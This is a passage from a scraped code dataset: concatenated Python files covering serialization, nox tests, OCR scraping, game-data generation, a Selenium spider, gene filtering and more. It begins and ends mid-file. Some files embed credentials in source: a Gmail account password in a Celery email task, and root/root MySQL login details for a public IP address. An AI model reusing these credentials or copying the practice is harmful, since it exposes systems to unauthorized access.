BaseModel(object):\n\n def serialize(self, allow_none=False):\n def serialize_func(obj):\n if isinstance(obj, BaseModel):\n ret = {}\n for k, v in vars(obj).items():\n r = serialize_func(v)\n if allow_none or r is not None:\n ret[k] = r\n return ret\n elif isinstance(obj, list):\n return [serialize_func(o) for o in obj if allow_none or serialize_func(o) is not None]\n else:\n return obj.decode('utf-8') if isinstance(obj, bytes) else obj\n return serialize_func(self)\n\n","sub_path":"aixiaotong/common/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"70141223","text":"\"\"\"Nox sessions.\"\"\"\n\nfrom nox_poetry import Session, session\n\nPYTHON_VERSIONS = \"3.8\", \"3.9\"\n\n\n@session(python=PYTHON_VERSIONS)\ndef tests(session: Session) -> None:\n session.install(\".\")\n session.install(\"pytest\")\n session.run(\"pytest\")\n","sub_path":"noxfile.py","file_name":"noxfile.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47829864","text":"from celery import Celery\nfrom celery import shared_task\nfrom time import sleep\nimport yagmail\n\n\napp = Celery(\n 'tasks',\n backend='redis://localhost',\n broker='redis://localhost',\n)\n\n@shared_task\ndef send(email, subject, body):\n receiver = email\n subject = subject\n body = body\n password = \"peryag888\"\n\n yag = yagmail.SMTP(\"peryagtest@gmail.com\")\n yag.send(\n to=receiver,\n subject=subject,\n contents=body, \n )\n\n\n\n","sub_path":"loginapp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"610097321","text":"#!/usr/bin/env python3\n\nfrom pathlib import Path\nfrom os import path\nimport argparse\nimport sys\nimport shutil\n\nMYDIR = path.dirname(path.abspath(__file__))\nARCHMAP = {\n \"amd64\": [\"--target=x86_64-pc-linux-gnu\"],\n \"arm64\": [\"--target=aarch64-linux-gnu\", \"-isystem/usr/aarch64-linux-gnu/include\"],\n \"x86\": [\"--target=i686-linux-gnu\"],\n \"armv7\": [\"--target=arm-linux-gnueabihf\", \"-march=armv7a\", \"-isystem/usr/arm-linux-gnueabihf/include\"],\n}\n\nEXTRA_OPTIONS = [\n \"-O1\", # do some basic opts\n \"-ggdb\", # emit debug info\n \"-pipe\", # use less filesystem\n \"-w\", # ignore warnings\n]\n\n\ndef emit_mk_dir(of, dstdir):\n of.write(f\"mkdir -p {dstdir}\\n\")\n\n\ndef emit_clang_cmdline(of, clang, special_opts, arch, dstfile, srcfile, suffix):\n cmd_line = [clang]\n # Options every clang invocation gets\n cmd_line.extend(EXTRA_OPTIONS)\n # architecture specific args\n cmd_line.extend(ARCHMAP[arch])\n # special arguments for this specific invocation\n if special_opts:\n cmd_line.extend(special_opts)\n # Generate bitcode and not do a full compilation\n cmd_line.extend([\"-o\", str(dstfile.with_suffix(suffix)), str(srcfile)])\n\n # write out the cmdline\n of.write(\" \".join(cmd_line))\n of.write(\"\\n\")\n\n\ndef emit_clang_bc_cmdline(of, clang, arch, dstfile, srcfile):\n emit_clang_cmdline(\n of, clang, [\"-emit-llvm\", \"-c\"], arch, dstfile, srcfile, suffix=\".bc\"\n )\n\n\ndef emit_clang_elf_cmdline(of, clang, arch, dstfile, srcfile):\n # emit a \"-c\" since these source files do not have a `main`\n emit_clang_cmdline(of, clang, [\"-c\"], arch, dstfile, srcfile, suffix=\".elf\")\n\n\ndef emit_mkdir_command(\n of, source_file, source_dir_base, dest_dir_base, previous_dir=None\n):\n # convert source filename to one in the destination directory tree\n idx = source_file.parts.index(source_dir_base)\n new_path = dest_dir_base.joinpath(*source_file.parts[idx + 1 :])\n\n # emit the mkdir command to create the output directory\n # skip emitting duplicates, since many files share the same subdirectory\n new_dir = new_path.parent\n if new_dir != previous_dir:\n emit_mk_dir(of, new_dir)\n return new_dir\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--clang\",\n default=\"clang-11\",\n help=\"Which clang binary to run, default clang-11\",\n )\n parser.add_argument(\n \"--source\", default=f\"{MYDIR}/../source\", help=\"where to look for source files\"\n )\n parser.add_argument(\n \"--dest\", default=f\"{MYDIR}/../compiled\", help=\"where to put output\"\n )\n parser.add_argument(\n \"--emit-bitcode\",\n default=False,\n action=\"store_true\",\n help=\"Emit commands to compile to bitcode\",\n )\n parser.add_argument(\n \"--emit-binaries\",\n default=False,\n action=\"store_true\",\n help=\"Emit commands to compile binaries\",\n )\n parser.add_argument(\n \"-o\",\n \"--outfile\",\n default=\"/dev/stdout\",\n help=\"Output file to write, default to stdout\",\n )\n\n args = parser.parse_args()\n\n if not args.emit_bitcode and not args.emit_binaries:\n sys.stderr.write(\"Nothing to do.\\n\")\n sys.stderr.write(\"Please specify --emit-bitcode or --emit-binaries\\n\")\n sys.exit(1)\n\n if shutil.which(args.clang) is None:\n sys.stderr.write(f\"Could not find clang command: {args.clang}\\n\")\n sys.exit(1)\n\n source_path = Path(args.source)\n # find every .c file\n sources = list(source_path.rglob(\"*.c\"))\n\n # find the last part of the source path, so that we can replicate source tree in destination dir\n last_source_part = source_path.parts[-1]\n\n if 0 == len(sources):\n sys.stderr.write(f\"Could not find any C source in {args.source}\\n\")\n sys.exit(1)\n\n worklist = []\n previous_dir = None\n\n output_styles = []\n emit_functions = {}\n if args.emit_bitcode:\n output_styles.append(\"bitcode\")\n emit_functions[\"bitcode\"] = emit_clang_bc_cmdline\n if args.emit_binaries:\n output_styles.append(\"binaries\")\n emit_functions[\"binaries\"] = emit_clang_elf_cmdline\n\n with open(args.outfile, \"w\") as of:\n for (arch, cmdargs) in ARCHMAP.items():\n for outstyle in output_styles:\n destination = Path(f\"{args.dest}/{outstyle}/{arch}\")\n for source in sources:\n previous_dir = emit_mkdir_command(\n of, source, last_source_part, destination, previous_dir\n )\n # save the arch/source/dest pair to avoid recomputing it\n worklist.append(\n (\n arch,\n previous_dir.joinpath(source.name),\n source,\n outstyle,\n )\n )\n\n # emit clang command lines to output bitcode\n for item in worklist:\n emit_functions[item[3]](\n of, args.clang, arch=item[0], dstfile=item[1], srcfile=item[2]\n )\n","sub_path":"scripts/generate_compile_commands.py","file_name":"generate_compile_commands.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52825219","text":"import numpy as np\n\n\ndef solve(y, x, x_pred):\n # x transpose\n x_dash = x.T\n # product of x_dash and x\n X = x_dash.dot(x)\n # inverse of X\n X_inv = np.linalg.inv(X)\n # producet of X_inv and x_dash\n X_final = X_inv.dot(x_dash)\n # product of X_final and y i.e B\n B = X_final.dot(y)\n # calculate the y_pred\n y_pred = x_pred.dot(B)\n return y_pred\n\n\ndef main():\n m, n = map(int, input().strip().split())\n y = []\n x = []\n x_pred = []\n for _ in range(n):\n *features, y_val = map(float, input().strip().split())\n x.append([1] + features)\n y.append(y_val)\n\n for _ in range(int(input())):\n features = list(map(float, input().strip().split()))\n x_pred.append([1] + features)\n\n y = np.array(y)\n x = np.array(x)\n x_pred = np.array(x_pred)\n answer = solve(y, x, x_pred)\n\n for num in answer:\n print(round(num, 2))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"HackerRank/Statistics/day9-LinearRegression.py","file_name":"day9-LinearRegression.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"365191690","text":"import pytesseract #图片转文字\nfrom PIL import Image#处理图片\nimport time#计算时间\nimport xlwt#操作excel\nimport os#遍历文件夹\nimport matplotlib.pyplot as plt#处理图片\nimport matplotlib.image as mpimg#处理图片\nimport numpy as np#处理图片\nfrom scipy import misc#处理图片\nimport xlutils.copy#操作excel\nimport xlrd#操作excel\nimport requests#爬取网站\nfrom bs4 import BeautifulSoup#爬取网站\nimport urllib.request#爬取网站\nimport re#正则\nimport sys\nimport json#python转json json转python\nimport pymongo#操作数据库\nfrom pymongo import MongoClient#操作数据库\n\na1 = '企业注册码'\na2 = '企业名称'\na3 = '类型'\na4 = '住所'\na5 = '法定代表人'\na6 ='成立时间'\na7 = '注册资本'\na8 = '营业期限'\na9 = '经营范围'\na10 = '登记机关'\no = 0\n\ndef get_Image(tupian):\n url = 'http://140.143.121.215:8080/'#爬取地址\n html = requests.get(url)#发送requests请求,获得地址源代码\n soup = BeautifulSoup(html.text, 'lxml')#做一碗汤,以lxml为标准\n img = soup.findAll('li')#获得源代码中的l标签\n content = r'
  • '#正则规则,匹配到括号内的内容\n\n for i in range(len(img)):#循环li标签的长度\n img[i] = str(img[i])#获得img[i]内的内容并转成字符串形式\n ans = re.findall(content, img[i], re.S | re.I)#正则匹配img[i],以content为flag,找到所有符合要求的字符串\n dizhi = 'http://140.143.121.215:8080/' + ans[0]#因为图片地址前面地址内容固定,顾需要正则匹配到的字符串加固定字符串等于该图片的源地址\n urllib.request.urlretrieve(dizhi, tupian+'/'+ str(i + 1) + '.png')#图片保存到本地\n\n\ndef file_name(filename): #指定文件夹下排序\n book = xlwt.Workbook(encoding='utf-8', style_compression=0)#建立一个excel文件,\n sheet = book.add_sheet('photo', cell_overwrite_ok=True)#在新建的excel中添加一个sheet,名叫photo\n sheet.write(0, 0, a1)#在坐标0,0添加内容a1\n sheet.write(0, 1, a2)\n sheet.write(0, 2, a3)\n sheet.write(0, 3, a4)\n sheet.write(0, 4, a5)\n sheet.write(0, 5, a6)\n sheet.write(0, 6, a7)\n sheet.write(0, 7, a8)\n sheet.write(0, 8, a9)\n sheet.write(0, 9, a10)\n book.save(filename + 'test.xls')#保存该excel文件,该文件的保存形式是除该内容其他内容全是空白\n for a,b,c in os.walk(filename):#遍历传入的文件夹\n # print(a) #当前路径\n # print(b) #当前路径下的所有子目录\n # print(c) #当前路径下的所有非目录子文件\n list1=[]#建立列表list1\n list2=[]\n for i in c:\n temp = re.compile(r'\\d+')#因为图片的保存是以数字为名保存的,利用正则匹配文件夹中的以数字命名的图片,以temp为flag匹配字符串\n res = re.findall(temp,i)#正则的匹配,匹配i中符合temp规则的字符串\n for j in res:\n list1.append(j)#把匹配到的字符串添加到列表list1中\n\n for i in list1:#遍历列表list1\n sum=int(i)#文件名默认是字符串格式,要转成int才能进行数字的比较,因为字符串的11<2,所以图片的识别不是顺序的,导致识别出来的信息不是顺序的\n list2.append(sum)#把sum的值赋给列表list2\n sum=sorted(list2)#利用sorted自动令list2排序\n for i in sum:\n temp = str(i)+'.png'#此时的sum是顺序的,但要把数字再次转成字符串格式才能匹配到文件夹中的文件\n temp = filename+'/'+temp#图片的文件名字加本地的地址,形成图片的绝对地址,图片打开用\n\n text = pytesseract.image_to_string(Image.open(temp), lang='chi_sim')#图片转文字,\n b = text[12:30] # 企业注册号号码\n d = text[42:68] # 名称\n e = text[76:110] #类型\n f = text[118:152]#住所\n g = text[164:170]#法定代表人\n h = text[180:192] # 成立时间\n m = text[201:216]#注册资本\n j = text[236:440]#经营范围\n k = text[450:470]#登记机关\n x = h+'至今'\n\n\n\n rb = xlrd.open_workbook(filename+'test.xls')#以xlrd打开一个excel文件\n wb = xlutils.copy.copy(rb)#问了不覆盖原来的信息,需要copy原来的文件,获取原来文件的内容\n ws = wb.get_sheet(0)#获得打开excel,获得该excel中的第一个sheet\n ws.write(i, 0, b)#在i,0地址存入b的内容\n ws.write(i, 1, d)\n ws.write(i, 2, e)\n ws.write(i, 3, f)\n ws.write(i, 4, g)\n ws.write(i, 5, h)\n ws.write(i, 6, i)\n ws.write(i, 7, x)\n ws.write(i, 8, j)\n ws.write(i, 9, k)\n wb.save(filename + r'/test.xls')#保存excel,覆盖原来的excel文件,但依然能保留原来的信息\n return\n\n\ndef file_name1(filename1): #指定文件夹下排序\n # book = xlwt.Workbook(encoding='utf-8', style_compression=0)#建立一个excel文件,\n # sheet = book.add_sheet('photo', cell_overwrite_ok=True)#在新建的excel中添加一个sheet,名叫photo\n # sheet.write(0, 0, a1)#在坐标0,0添加内容a1\n # sheet.write(0, 1, a2)\n # book.save(filename1+'test.xls')#保存该excel文件,该文件的保存形式是除该内容其他内容全是空白\n\n for a,b,c in os.walk(filename1):\n # print(a) #当前路径\n # print(b) #当前路径下的所有子目录\n # print(c) #当前路径下的所有非目录子文件\n list1=[]\n list2=[]\n for i in c:\n temp = re.compile(r'\\d+')#因为图片的保存是以数字为名保存的,利用正则匹配文件夹中的以数字命名的图片,以temp为flag匹配字符串\n res = re.findall(temp,i)#正则的匹配,匹配i中符合temp规则的字符串\n for j in res:\n list1.append(j)#把匹配到的字符串添加到列表list1中\n\n for k in list1:#遍历列表list1\n sum=int(k)#文件名默认是字符串格式,要转成int才能进行数字的比较,因为字符串的11<2,所以图片的识别不是顺序的,导致识别出来的信息不是顺序的\n list2.append(sum)#把匹配到的字符串添加到列表list1中\n sum=sorted(list2)#利用sorted自动令list2排序\n for j in sum:\n temp = str(j)+'.png'#此时的sum是顺序的,但要把数字再次转成字符串格式才能匹配到文件夹中的文件\n temp = filename1+temp#图片的文件名字加本地的地址,形成图片的绝对地址,图片打开用\n le = mpimg.imread(temp)#读取图片\n le = le[0:76, 0:500, :]#根据图片的像素截取图片,只取前两行,\n le2 = misc.imresize(le, 0.99)#比例调整图片\n plt.imshow(le2)#show图片\n plt.axis('off')#把图片中的横纵坐标关闭,不显示\n plt.savefig('test.png')#保存该图片\n plt.show()\n # 二值处理:彩色转灰度,灰度转二值,二值图像识别\n im = Image.open('test.png')#打开要是别的图片\n imgry = im.convert('L')#灰度处理图片\n imgry.show()\n threshold = 140#设置中间值\n table = []#元组\n for wo in range(256):\n if wo < threshold:\n table.append(0)\n else:\n table.append(1)\n\n out = imgry.point(table, '1')#二值形成图片 1代表RGB\n out.save('test.png')#保存图片\n out.show()\n\n\n text = pytesseract.image_to_string(Image.open('test.png'), lang='chi_sim')#图片转文字,\n d = text[12:30] # 企业注册号号码\n f = text[40:] # 名称\n\n rb = xlrd.open_workbook(filename1 + 'test.xls')#以xlrd打开一个excel文件\n wb = xlutils.copy.copy(rb)#问了不覆盖原来的信息,需要copy原来的文件,获取原来文件的内容\n ws = wb.get_sheet(0)#获得打开excel,获得该excel中的第一个sheet\n ws.write(j, 0, d)#在i,0地址存入d的内容\n ws.write(j, 1, f)\n wb.save(filename1 + r'/test.xls')#保存excel,覆盖原来的excel文件,但依然能保留原来的信息\n plt.close('all')#关闭图片,否则循环每次识别图片会形成重叠\n return\n\n\ndef cunku():\n # 连接数据库\n client = MongoClient('localhost', 27017)#连接数据库,地址+端口\n db = client['test']#连接test数据库\n\n ta = db['student']#连接student集合\n ta.drop()#删除集合\n\n data = xlrd.open_workbook('E:/meishi/test.xls')#打开要存入的excel文件\n table = data.sheets()[0]#获得excel文件中的第一个sheet\n rowstag = table.row_values(0)#获得该sheet下的第一行作为key\n nrows = table.nrows#获得该sheet的所有行\n returnData = {}#字典\n for i in range(1, nrows):#循环1到行数(不包括行数的当前值)\n returnData[i] = json.dumps(dict(zip(rowstag, table.row_values(i))))#将python的数据类型转成json,形成一个字典\n returnData[i] = json.loads(returnData[i])#将json格式的信息转成python的数据类型 也叫json解码\n ta.insert(returnData[i])#将数据插入到数据库中\n\n\ndef yemian():\n print('---------------------------------')\n print('-----1-----------爬虫--------------')\n print('-----2--------识别图片全部---------')\n print('-----3------识别图片部分----------')\n print('-----4-----选择存储到数据库-------')\n\n\nif __name__ == '__main__':\n yemian()\n shuzi = int(input('请输入你心仪的数字'))\n if shuzi == 1:\n tupian = input('麻烦在输入一下图片保存地址')\n get_Image(tupian)\n if shuzi == 2:\n filename = input('这就牛逼了,你输个地址就能把你地址里的文字转成图片')\n file_name(filename)\n if shuzi == 3:\n filename1 = input('这个比上一个稍微虚点,只能识别部分')\n file_name1(filename1)\n if shuzi == 4:\n y = input('你要不要存数据库啊,mongodb很牛逼的啊(y/n)')\n if y == 'y':\n cunku()\n else:\n print('不存还选我,浪费时间')","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":10177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"561326578","text":"import unicodecsv as csv\r\nimport pandas as pd\r\n\r\n# These columns may vary depending on what pops you have added to the game\r\n# Change as necessary\r\nid_column = \"PROVID\"\r\nname_column = \"NAME\"\r\nculture_column = \"CULTURE\"\r\nreligion_column = \"Religion\"\r\ntradegoods_column = \"TRADEGOOD\"\r\ncivilization_column = \"INDUSTRIALISATION\"\r\nbarbarian_column = \"unused\"\r\nprovince_rank_column = \"PROVINCE_RANK\"\r\narea_column = \"AREA\"\r\nterrain_column = \"TERRAIN\"\r\n# Pop values\r\ncitizen_column = \"unused\"\r\nslaves_column = \"slaves\"\r\ntribesmen_column = \"tribesmen\"\r\n# Pops for the 1815 mod\r\nindentured_column = \"indentured\"\r\nlower_strata_column = \"lower_strata\"\r\nmiddle_strata_column = \"middle_strata\"\r\nupper_strata_column = \"upper_strata\"\r\nproletariat_column = \"proletariat\"\r\n# Extra minority pops, beginning with pop type column\r\nextra_pop1 = 21\r\nextra_pop2 = 25\r\nextra_pop3 = 29\r\nextra_pop4 = 33\r\nextra_pop5 = 37\r\nextra_pop6 = 41\r\nextra_pop7 = 45\r\nextra_pops = [extra_pop1, extra_pop2, extra_pop3, extra_pop4, extra_pop5, extra_pop6, extra_pop7]\r\n# Add these values to above minority pop columns to get corresponding data\r\nculture = 1\r\nreligion = 2\r\nsize = 3\r\n\r\n# Data validation for pop types\r\nvalid_pops = [\"lower_strata\",\"proletariat\",\"middle_strata\",\"upper_strata\",\"slaves\",\"tribesmen\",\"indentured\"]\r\n\r\nterrain_file = open(\"province_terrain/00_province_terrain.txt\",encoding=\"utf=8\")\r\n\r\n# OUTPUT FILE\r\nbuilding_list = open(\"building_list.txt\",\"w\",encoding=\"utf=8\")\r\n# INPUT FILE\r\nsetup_csv = open(\"province_setup.csv\", \"rb\")\r\n#reader = csv.reader(setup_csv, delimiter=\";\")\r\nreader = pd.read_csv(setup_csv, sep=';')\r\nreader = reader.fillna(\"\") # Fill all NaN values with empty strings\r\n\r\n# Only list provinces with city status, because we're only going to give them buildings\r\n#reader = reader[reader.PROVINCE_RANK != 0]\r\n\r\n# Get the total population, N.B. this only gets main culture pops and does not include extra pops.\r\ndef get_total_population(row):\r\n try:\r\n total_population = int(row.indentured) + int(row.slaves) + int(row.tribesmen) + int(row.lower_strata) + int(row.middle_strata) + int(row.upper_strata) + int(row.proletariat)\r\n for extra_pop in extra_pops:\r\n if row[extra_pop].replace(\" \",\"_\") in valid_pops:\r\n total_population = total_population + row[extra_pop+size]\r\n return total_population\r\n except:\r\n return 0\r\n\r\ndef write_buildings():\r\n with building_list as f:\r\n f.write(\"### BEGIN GENERATED BUILDINGS\\n\\n\")\r\n for row in reader.itertuples():\r\n total_population = get_total_population(row)\r\n\r\n if total_population > 0:\r\n \r\n f.write(\" \" + str(row.PROVID) + \" = {\\n\" )\r\n residential = str(int(round(int(total_population/10)*0.8)*((3*int(row.INDUSTRIALISATION)) / 100)))\r\n if int(residential) > 0:\r\n f.write(\" URB_residential_district = \" + residential + \"\\n\")\r\n administration = str(int(round(int(row.middle_strata) / 10))) \r\n if int(administration) > 0:\r\n f.write(\" URB_administration_district = \" + administration + \"\\n\")\r\n commerce = str(int(round((int(row.middle_strata) + int(row.upper_strata)) / 10)))\r\n if int(commerce) > 0:\r\n f.write(\" URB_commerce_district = \" + commerce + \"\\n\") \r\n cultural = str(int(round((int(row.middle_strata) + int(row.upper_strata)) / 13)))\r\n if int(cultural) > 0:\r\n f.write(\" URB_cultural_district = \" + cultural + \"\\n\") \r\n school = str(int(round(int(row.middle_strata) / 10)))\r\n if int(school) > 0:\r\n f.write(\" EDU_school = \" + school + \"\\n\") \r\n sewer = str(int(round((total_population/30)*(int(row.INDUSTRIALISATION) / 100))))\r\n if int(sewer) > 0:\r\n f.write(\" INF_sewer_infrastructure = \" + sewer + \"\\n\" )\r\n RGO = str(int(round(2 *((0.25*int(row.INDUSTRIALISATION)) ))))\r\n if int(RGO) > 0:\r\n f.write(\" IND_resource_gathering_operation = \" + RGO + \"\\n\" )\r\n depot = str(int(round((total_population/20)*((3*int(row.INDUSTRIALISATION)) / 50))))\r\n if int(depot) > 0:\r\n f.write(\" INF_depot = \" + depot + \"\\n\" )\r\n hospital = str(int(round((int(row.middle_strata)/5)*(int(row.INDUSTRIALISATION) / 100))))\r\n if int(hospital) > 0:\r\n f.write(\" INF_hospital = \" + hospital + \"\\n\" )\r\n f.write(\" }\\n\")\r\n \r\n f.write(\"###END GENERATED BUILDINGS\")\r\n \r\n\r\nwrite_buildings()\r\n","sub_path":"common/buildings_generator.py","file_name":"buildings_generator.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"489079429","text":"# Copyright (C) 2020 GreenWaves Technologies, SAS\n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\nfrom .utils import at_bits\n\nGEN_MULCONV_POOL_RELU = \"CNN_ConvolutionMulBiasPoolReLU\"\n\ndef gen_at_mulconv_pool_relu(code_block, name, in_q, out_q,\n filt_q, bias_q, mul_biases_q, in_dim, out_dim,\n at_conv, at_pool, at_active, gen_ctrl=None, at_ver=3):\n if gen_ctrl is None:\n gen_ctrl = \"0\"\n else:\n gen_ctrl = gen_ctrl.ctrl_name\n\n if at_ver < 3:\n raise NotImplementedError(\"mulbias before ver 3 not supported\")\n\n code_block.write('{}(\"{}\", {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, 1, 1, 1, 1, 1, {}, {}, {}, {},',\n GEN_MULCONV_POOL_RELU, name, gen_ctrl,\n at_bits(in_q), at_bits(filt_q), at_bits(\n bias_q), at_bits(mul_biases_q), at_bits(out_q),\n in_q.q, filt_q.q, bias_q.q, mul_biases_q.q, out_q.q,\n in_dim.c, out_dim.c, in_dim.w, in_dim.h)\n code_block.indent()\n code_block.write('{}, {}, {}, {}, {}, {}, {}, {},',\n at_conv.ConvOper, at_conv.Fcx, at_conv.Fcy,\n at_conv.Dcx, at_conv.Dcy, at_conv.Scx, at_conv.Scy,\n at_conv.ConvPad)\n code_block.write('{}, {}, {}, {}, {}, {}, {}, {}, {});',\n at_pool.PoolOper, at_pool.Fpx, at_pool.Fpy,\n at_pool.Dpx, at_pool.Dpy, at_pool.Spx, at_pool.Spy,\n at_pool.PoolPad, at_active.ReLUOper)\n code_block.deindent()\n","sub_path":"tools/nntool/generation/at_generators/cnn_convolution_mulbias_pool_relu.py","file_name":"cnn_convolution_mulbias_pool_relu.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"521746109","text":"import os\n\nfrom skimage import data, io, filters\n\nimport numpy as np\n\n\nimage = io.imread('pic1.png')\n#print(image[0])\n#print(len(image[0]))\n#print(len(image))\n#print(type(image[0][0][0]))\n#print(np.mean(image[1]))\n#filename = os.path.join(skimage.data_dir, '1pic.png')\n#moon = io.imread(filename)\n\nnewimage = []\n\nfor i in range(0,len(image)):\n\tfor j in range(0,len(image[i])):\n\t\tbrightness = float(image[i][j][0])*(0.3) +float(image[i][j][1])*(0.59) +float(image[i][j][2])*(0.11)\n\t\tnewimage += [brightness]\n\n#print(newimage)\n#print(image[0][0])\n\ntemp = [0]*(4000)\ncount = 0;\nindex = 0;\nfor i in range(0,200*200):\n\ttemp[index] = temp[index] + newimage[i]\n\tcount = count + 1\n\tif count == 10:\n\t\tcount = 0\n\t\tindex = index + 1\nindex = 0\ncount = 0\nlast = [0]*400\nfor i in range(0,4000):\n\tlast[index] = last[index] + temp[i]\n\tindex = index + 1\n\tif((index%20) == 0):\n\t\tindex = index - 20\n\tif((i != 0)&(i%200 == 0)):\n\t\tindex = index + 20\n\nwith open(\"anotherdata.txt\", \"w\") as myfile:\n\tmyfile.close()\n\nwith open(\"anotherdata.txt\", \"a\") as myfile: #destination file to add to\n\t#myfile.write(\"appended text\")\n\tfor item in last:\n\t\tmyfile.write(str(item) + \",\")\n\tmyfile.write(\"\\n\")\n\nprint('done')\n\n#print(last)","sub_path":"k-means/scanimage.py","file_name":"scanimage.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"236131839","text":"from selenium import webdriver\nimport time\n\n\nclass UserSpider:\n __browser = None\n\n def __init__(self, offset):\n self.__offset = offset\n self.__getbrowser()\n\n def __getbrowser(self):\n url = \"https://www.douyu.com/\" + str(self.__offset)\n self.__browser = webdriver.Chrome()\n self.__browser.get(url)\n time.sleep(6)\n\n # 传入浏览器对象,得到数据\n def getdata(self):\n title = self.__browser.find_element_by_class_name('layout-Player-title')\n\n playtitle = title\\\n .find_element_by_class_name('Title-headlineH2')\\\n .text\n headimg = title\\\n .find_element_by_class_name('Title-anchorPicImg')\\\n .get_attribute('src')\n follownum = title\\\n .find_element_by_class_name('Title-followNum')\\\n .text\n weenrank = title\\\n .find_element_by_class_name('WeekRankTitle-upDownBoxMiddleConRank')\\\n .text\n hot = title\\\n .find_element_by_class_name('Title-anchorText')\\\n .text\n anchorname = title\\\n .find_element_by_class_name('Title-anchorNameH1')\\\n .text\n tagsnode1 = title\\\n .find_elements_by_class_name('Title-categoryItem')\n tagsnode2 = title\\\n .find_elements_by_class_name(\"AnchorImpress-listItemTag\")\n tagsnode3 = title\\\n .find_elements_by_class_name(\"Title-official\")\n\n tags = []\n for item in tagsnode1:\n a = item.text\n tags.append(a)\n for item in tagsnode2:\n a = item.text\n tags.append(a)\n for item in tagsnode3:\n a = item.text\n tags.append(a)\n self.__browser.close()\n\n return {\n 'playtitle': playtitle,\n 'anchorname': anchorname,\n 'headimg': headimg,\n 'hot': hot,\n 'follownum': follownum,\n 'weekrank': weenrank,\n 'tags': tags\n }\n","sub_path":"Flask/envir/Scripts/Flask/spider/UserSpider.py","file_name":"UserSpider.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"281003449","text":"# preprocessing data second phase (gExpressions2.pickle, and gNames2.pickle)\n# it eliminates genes if RMA values of more than 90% of them are less than 6.\n\nimport pickle\nimport numpy as np\n\ndef notSigExpressed(aList, numCell, prop, magicN):\n\tcount=0\n\tfor i in aList:\n\t\tif inumCell*prop:\n\t\treturn True\n\telse:\n\t\treturn False\n\ngExpressions=pickle.load(open('./prePickles/gExpressions.pickle','r'))\ngNames=pickle.load(open('./prePickles/gNames.pickle','r'))\n\nnumCell=gExpressions.shape[1]\nwhichRowFiltered=[]\nfor rawI, g in enumerate(gExpressions):\n\tif notSigExpressed(g,numCell,0.9,6):\n\t\twhichRowFiltered.append(rawI)\n\nwhichRowNotFiltered=set(range(gExpressions.shape[0]))\nwhichRowNotFiltered-=set(whichRowFiltered)\nwhichRowNotFiltered=list(whichRowNotFiltered)\nwhichRowNotFiltered.sort()\n\ngExpressions2=gExpressions[whichRowNotFiltered]\ngNames2=gNames[whichRowNotFiltered]\n\npickle.dump(gExpressions2,open('./prePickles/gExpressions2.pickle','w'))\npickle.dump(gNames2,open('./prePickles/gNames2.pickle','w'))\n","sub_path":"dataPrepro2.py","file_name":"dataPrepro2.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"375277795","text":"\narchivo = open(\"quijote.txt\",\"r\")\ndic = {}\nfor lines in archivo.readlines():\n for palabra in lines.split():\n if palabra in dic:\n dic[palabra]= dic[palabra]+1\n else:\n dic[palabra]= 1\n\nprint(dic)\n#Falta lo de los signos de puntuacion\n","sub_path":"cuentapalabras.py","file_name":"cuentapalabras.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"398163900","text":"\"\"\"Solution.\n\nHackerRank > Algorithms > Warmup > Compare the Triplets.\n\"\"\"\n\n\ndef compareTriplets(a, b):\n \"\"\"Problem solution.\"\"\"\n ap, bp = 0, 0\n for i in range(len(a)):\n ap += 1 if a[i] > b[i] else 0\n bp += 1 if b[i] > a[i] else 0\n return [ap, bp]\n","sub_path":"hackerrank/algorithms/warmup/Compare the Triplets/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"329378959","text":"import requests\nimport re\nimport bs4\nfrom bs4 import BeautifulSoup\nimport bs4\nimport pymysql\n\nheaders ={\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0'\n }\n\n#全局变量\nglobal mid,eid,oid\nmid = int(0)\neid = int(0)\noid = int(0)\n\nmuseum_info = {}\n\nclass ConnMysql(object):\n def __init__(self):\n # 连接数据库\n self.db = pymysql.connect(host='39.97.241.101',\n port=3306,\n database='testsitedb',\n user='root',\n password='root',\n charset='utf8')\n self.cursor = self.db.cursor()\n def insert(self,dict1):\n global 